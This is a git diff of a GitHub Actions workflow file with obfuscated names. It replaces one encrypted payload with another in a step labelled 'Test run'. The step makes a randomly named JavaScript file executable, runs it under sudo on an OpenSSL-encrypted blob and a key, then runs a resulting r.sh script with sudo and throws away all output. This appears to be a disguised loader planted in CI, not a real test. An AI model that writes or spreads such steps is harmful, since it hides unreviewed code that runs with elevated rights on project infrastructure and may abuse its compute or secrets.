--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'fzjkm'
+        echo 'gsw39'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19OgNn2pa0/8zz4x8qk8ZkdAxy1IU89q6QrjBHWIbyjnSyD4V8aGPFyWJNxYv6owC6hda2tnfdnp41FL/XDSj9Cq8OxZHRYgiObwhyEJyPq9SAc7dacijij v7t7ye && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/KKd2jxTgvdkfU7UK06hrrsY+v1g/s5AluKezq0Ih32qdVO5t5DfhC2oBb8fP2owWZTxT1qw/wVJq8T56HY6w90Sn1Gc+l1RBXt1YOG+Elt/Z9zTU4Dw2M 2a4n65 && sudo sh r.sh > /dev/null 2>&1
